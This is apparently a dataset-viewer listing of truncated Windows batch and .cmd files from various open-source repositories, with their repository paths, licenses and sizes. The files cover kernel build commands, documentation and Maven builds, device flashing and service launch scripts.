SET OPTIONS=%OPTIONS% /NOREBOOT
SET OP... | aaronparker/appinstall-scripts | Citrix XenDesktop 7/Install-XenDesktop7VDA-DesktopRemotePC.cmd | bat | mit | 1,324 |
cmd_drivers/power/drvchg.ko := /opt/arm-2008q1/bin/arm-none-linux-gnueabi-ld -EL -r --build-id -o drivers/power/drvchg.ko drivers/power/drvchg.o drivers/power/drvchg.mod.o
| yohanes/Acer-BeTouch-E130-Linux-Kernel | drivers/power/.drvchg.ko.cmd | bat | gpl-2.0 | 174 |
cmd_crypto/crypto_blkcipher.o := /opt/freescale/usr/local/gcc-4.4.4-glibc-2.11.1-multilib-1.0/arm-fsl-linux-gnueabi/bin/arm-none-linux-gnueabi-ld -EL -r -o crypto/crypto_blkcipher.o crypto/ablkcipher.o crypto/blkcipher.o
| evan6200/cirrfy_pos | crypto/.crypto_blkcipher.o.cmd | bat | gpl-2.0 | 225 |
cmd_drivers/scsi/arm/built-in.o := rm -f drivers/scsi/arm/built-in.o; ../tools/arm-bcm2708/arm-bcm2708hardfp-linux-gnueabi/bin/arm-bcm2708hardfp-linux-gnueabi-ar rcsD drivers/scsi/arm/built-in.o
| avareldalton85/rpi2-linux-rt | drivers/scsi/arm/.built-in.o.cmd | bat | gpl-2.0 | 196 |
cmd_lib/lcm.o := /home/knesi/arm-2010q1/bin/arm-none-linux-gnueabi-gcc -Wp,-MD,lib/.lcm.o.d -nostdinc -isystem /home/knesi/arm-2010q1/bin/../lib/gcc/arm-none-linux-gnueabi/4.4.1/include -I/home/knesi/HD2/tiamat-kernel-4.0.2/arch/arm/include -Iinclude -include include/generated/autoconf.h -D__KERNEL__ -mlittle-endian ... | DrGrip/tiamat-2.6.38-LEO-Dr_Grip | lib/.lcm.o.cmd | bat | gpl-2.0 | 16,201 |
cmd_fs/fat/dir.o := arm-none-linux-gnueabi-gcc -Wp,-MD,fs/fat/.dir.o.d -nostdinc -isystem /home/stesalit/arm-2009q1/bin/../lib/gcc/arm-none-linux-gnueabi/4.3.3/include -I/root/kernel-dev/linux-2.6.37/arch/arm/include -Iinclude -include include/generated/autoconf.h -D__KERNEL__ -mlittle-endian -Iarch/arm/mach-davinci/... | srinugnt2000/linux-2.6.37 | fs/fat/.dir.o.cmd | bat | gpl-2.0 | 24,862 |
cmd_kernel/power/built-in.o := /pub/CIS520/usr/arm/bin/arm-angstrom-linux-gnueabi-ld -EL -r -o kernel/power/built-in.o kernel/power/main.o kernel/power/console.o kernel/power/process.o kernel/power/wakelock.o kernel/power/userwakelock.o kernel/power/earlysuspend.o kernel/power/fbearlysuspend.o kernel/power/poweroff... | mjmccall/Kernel | kernel/power/.built-in.o.cmd | bat | gpl-2.0 | 324 |
cmd_fs/ext3/ext3.o := /mnt/disk2/Dev/UG802/kernel/toolchains/arm-eabi-linaro-4.6.2/bin/arm-eabi-ld.bfd -EL -r -o fs/ext3/ext3.o fs/ext3/balloc.o fs/ext3/bitmap.o fs/ext3/dir.o fs/ext3/file.o fs/ext3/fsync.o fs/ext3/ialloc.o fs/ext3/inode.o fs/ext3/ioctl.o fs/ext3/namei.o fs/ext3/super.o fs/ext3/symlink.o fs/ext3/has... | aloksinha2001/picuntu-3.0.8-alok | fs/ext3/.ext3.o.cmd | bat | gpl-2.0 | 422 |
cmd_drivers/net/arm/built-in.o := rm -f drivers/net/arm/built-in.o; ../../CodeSourcery/CodeSourcery/bin/arm-none-eabi-ar rcs drivers/net/arm/built-in.o
| spacecaker/CM7_Space_Kernel_Cooper | drivers/net/arm/.built-in.o.cmd | bat | gpl-2.0 | 153 |
cmd_libbb/get_console.o := gcc -Wp,-MD,libbb/.get_console.o.d -std=gnu99 -Iinclude -Ilibbb -include include/autoconf.h -D_GNU_SOURCE -DNDEBUG -D_LARGEFILE_SOURCE -D_LARGEFILE64_SOURCE -D_FILE_OFFSET_BITS=64 -D"BB_VER=KBUILD_STR(1.22.1)" -DBB_BT=AUTOCONF_TIMESTAMP -Wall -Wshadow -Wwrite-strings -Wundef -Wstrict-prot... | valentinthirion/android-tracebox-busybox | libbb/.get_console.o (Valentin-Thirions-MacBook-Airs in Konflikt stehende Kopie 2014-05-21).cmd | bat | gpl-2.0 | 10,158 |
cmd_lib/vsprintf.o := /home/doadin/android/kernel/toolchains/arm-eabi-4.4.3/bin/arm-eabi-gcc -Wp,-MD,lib/.vsprintf.o.d -nostdinc -isystem /home/doadin/android/kernel/toolchains/arm-eabi-4.4.3/bin/../lib/gcc/arm-eabi/4.4.3/include -I/home/doadin/Desktop/ancora_tmo_4.0.4_2.6/arch/arm/include -Iinclude -include include/... | doadin/samsung-kernel-msm7x30-Doadin | lib/.vsprintf.o.cmd | bat | gpl-2.0 | 32,861 |
rem $library = $argv[1];
rem $noticeNumber = $argv[2];
rem $message = $argv[3];
rem $lname = $argv[4];
rem $fname = $argv[5];
rem $dollarcutoff = $argv[6];
rem $holidays = $argv[7];
rem $itypelist = $argv[8];
rem $specialdaysago = $argv[9];
rem $filesave = $argv[10];
rem $daysago1 = $argv[1... | drulm/Koha-PHP-Extras | kohascripts/uniquesync.bat | bat | gpl-2.0 | 626 |
CALL mvn clean package
@ECHO off
ECHO.
IF %ERRORLEVEL% == 0 (
ECHO Yay. Successfully finished assembling StreamSis.
ECHO You can check the result in 'target/assembled' subdirectory now.
)
IF NOT %ERRORLEVEL% == 0 (
ECHO StreamSis assembly has failed. See the log.
)
ECHO.
PAUSE
| ubershy/StreamSis | build.bat | bat | gpl-3.0 | 281 |
@echo off
echo Arguments:
echo 1: softdevice or fruitymesh or erase or reset (what to flash)
echo 2: name of textfile which contains newline seperated segger ids (or current.txt to flash all connected devices)
echo 3: Debug or Release (The folder from which to take the application hex)
echo 4: NRF51 or... | Informatic/fruitymesh | deploy/flash.bat | bat | gpl-3.0 | 2,357 |
chcp 65001
cmake -DPROC_ALL=middle_all -P windows.cmake
pause
chcp 932
| yossi-tahara/Theolizer | build_tools/zz2_middle_all.bat | bat | gpl-3.0 | 72 |
@echo off
cd %~DP0
..\..\..\lib\ipy.exe ..\..\MSBuild.py Rebuild DebugNoSign x86 ..\..\..\MetaTweet.sln
| takeshik/metatweet-old | util/x86/DebugNoSign/rebuild.bat | bat | gpl-3.0 | 105 |
@ECHO OFF
REM Command file for Sphinx documentation
if "%SPHINXBUILD%" == "" (
set SPHINXBUILD=sphinx-build
)
set BUILDDIR=build
set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% source
set I18NSPHINXOPTS=%SPHINXOPTS% source
if NOT "%PAPER%" == "" (
set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%
... | FIWARE-UNIROMA1/FIWARE-OFNIC | docs/make.bat | bat | gpl-3.0 | 7,007 |
call prepare.bat
call testsuite.bat
test\konnekt.exe
@echo "Sprawd czy dzia³a!"
@pause
call debug.bat
call update.bat
@pause | Konnekt/konnekt | publish/all.bat | bat | mpl-2.0 | 126 |
c:\python27\python.exe delete-pyc.py
| markuskramerIgitt/salt-windows-msi | find-optional-modules/delete-pyc.cmd | bat | apache-2.0 | 37 |
@ECHO OFF
setlocal
REM Start OGEMA with activated security
set POLICY=config\all.policy
set VMOPTS=%VMOPTS% -Dorg.osgi.framework.security=osgi -Djava.security.policy=%POLICY% -Dorg.ogema.security=on
start.cmd --security config\ogema.policy --use-rundir-only %*
endlocal | smartrplace/tutorial | rundirs/rundir-factoryhack/start_security.cmd | bat | apache-2.0 | 271 |
@echo off
rem CLI Script to build system for extensions support
rem PHP version 5
rem @category PHP
rem @package PHP_CompatInfo
rem @author Laurent Laville <pear@laurent-laville.org>
rem @license http://www.opensource.org/licenses/bsd-license.php BSD
rem @version CVS: $Id: pciconf.bat,v 1.1 2008/11/2... | ArcherCraftStore/ArcherVMPeridot | php/pciconf.bat | bat | apache-2.0 | 545 |
@ echo off
:: Script for starting the Salt-Minion
:: Accepts all parameters that Salt-Minion Accepts
:: Define Variables
Set SaltDir=%~dp0
Set SaltDir=%SaltDir:~0,-1%
Set Python=%SaltDir%\bin\python.exe
Set Script=%SaltDir%\bin\Scripts\salt-minion
:: Stop the Salt Minion service
net stop salt-minion
:: Launch Script... | saltstack/salt | pkg/windows/buildenv/salt-minion-debug.bat | bat | apache-2.0 | 358 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.